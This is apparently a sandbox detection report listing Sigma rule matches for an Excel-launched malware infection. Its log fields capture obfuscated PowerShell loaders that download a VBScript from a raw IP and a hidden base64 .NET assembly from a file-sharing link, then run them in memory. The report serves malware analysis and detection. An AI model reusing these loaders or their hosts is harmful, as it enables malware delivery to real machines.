          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe, ProcessId: 3764, ProcessName: powershell.exe
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 3960, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2104, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 1932, ProcessName: aspnet_compiler.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline", ProcessId: 3860, ProcessName: csc.exe
          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 5.45.108.48, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3224, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vtjrhji, CommandLine: C:\Users\user\AppData\Roaming\vtjrhji, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vtjrhji, NewProcessName: C:\Users\user\AppData\Roaming\vtjrhji, OriginalFileName: C:\Users\user\AppData\Roaming\vtjrhji, ParentCommandLine: taskeng.exe {D690A31F-6F9A-4F5C-9D7D-F0EC28BCB101} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1], ParentImage: C:\Windows\System32\taskeng.exe, ParentProcessId: 4052, ParentProcessName: taskeng.exe, ProcessCommandLine: C:\Users\user\AppData\Roaming\vtjrhji, ProcessId: 3728, ProcessName: vtjrhji
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3648, TargetFilename: C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3224, Protocol: tcp, SourceIp: 5.45.108.48, SourceIsIpv6: false, SourcePort: 443
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 3960, ProcessName: wscript.exe
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3648, TargetFilename: C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3224, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1